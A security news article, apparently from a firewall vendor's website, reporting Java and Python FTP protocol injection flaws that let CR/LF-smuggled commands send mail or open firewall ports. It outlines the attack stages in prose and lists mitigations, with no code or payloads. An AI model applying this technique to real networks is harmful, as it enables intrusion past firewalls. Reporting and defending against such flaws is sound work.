Protect your corporate IT network from hackers and other unwanted intruders with Proxy Sentinel™. Click here for all the details and get the peace of mind you deserve.
Back to our Homepage Proxy Sentinel™ high performance Internet proxy server and secure firewall solution Firewall Sentinel™ secure & powerful Internet firewall solution About Internet Security.ca and GCIS Frequently Asked Questions on Internet security issues Internet Security Industry News - Stay informed of what's happening Contact Internet Security.ca today and order your Proxy Sentinel™ or Firewall Sentinel™ server now!

Java and Python have security flaws you can exploit to attack firewalls

Sponsered ads:
Read the latest IT news. Visit ItDirection.net. Updated several times daily.

If you need reliability when it comes to SMTP servers, get the best, get Port 587.

Get a powerful Linux Dual-Core dedicated server for less than $2.67 a day!

Share on Twitter.

February 21, 2017

It's rather safe to say today that most system admin in the industry will agree that Java and Python have serious security flaws that attackers can easily exploit to compromise some firewalls.

Since neither language are yet patched, it might be a good time to tell your developers about this, just in case they don't already know.

The Java security vulnerability simply means that protocol injection through its FTP implementation can fool a firewall into allowing TCP connections from the Internet to hosts on the inside. Nothing new there.

That's explained in more detail in two documents by Alexander Klink and by Blindspot Security's Timothy Morgan.

Klink's discovery was that Java's XML eXternal Entity (XEE) mishandles FTP connections, because it doesn't syntax-check the username Java passes to a server, and that's the core of the security vulnerability.

Specifically, cr and lf should be rejected but aren't, allowing non-FTP commands to be injected into a connection request. In his document, Klink's demonstration showed how to send an SMTP e-mail message in an FTP connection attempt, even though the FTP connection failed.

But it gets worse... Klink concluded that “this attack is particularly interesting in a scenario where you can reach an unrestricted, maybe not even spam- or malware-filtering internal mail server from the machine doing the XML parsing.”

Morgan's contribution was the realization that the same behavior can get an attacker through a firewall on its high ports (from 1024 to 65535), in a multi-stage process such as this:

  • Get an internal IP address – this, Morgan says, is easy: “send a URL, see how the client behaves, then try another until the attack is successful”;
  • Packet alignment – this is the secret weapon that makes the attack work. FTP is synchronous, meaning each side waits for a response to each individual line they send. If you get this wrong, the attack fails.
  • Morgan says he's holding back publication of a proof-of-concept script until Oracle (and Python's developers) respond to this security issue.

    But he envisages his exploit can be used for MITM attacks, server-side request forgery, an XEE attack and more, and once past the firewall, desktop hosts can be attacked even if they don't have Java installed.

    Python he warns, is similarly vulnerable as well through its urllib and urllib2 libraries, however “this injection appears to be limited to various attacks via directory names specified in the URL,” he asserted.

    And by way of mitigation, Morgan suggests disabling Java on desktops and in browsers, and disabling “classic mode” FTP on all firewalls. This cannot be stressed enough, the two security experts warn.

    Source: Blindspot Security.

    Sponsered ads:
    Read the latest IT news. Visit ItDirection.net. Updated several times daily.

    If you need reliability when it comes to SMTP servers, get the best, get Port 587.

    Get a powerful Linux Dual-Core dedicated server for less than $2.67 a day!

    Share on Twitter.


    Home | Proxy Sentinel™ | Firewall Sentinel™ | FAQ | News | Sitemap | Contact
    Copyright © Internet Security.ca    Terms of use    Privacy agreement    Legal disclaimer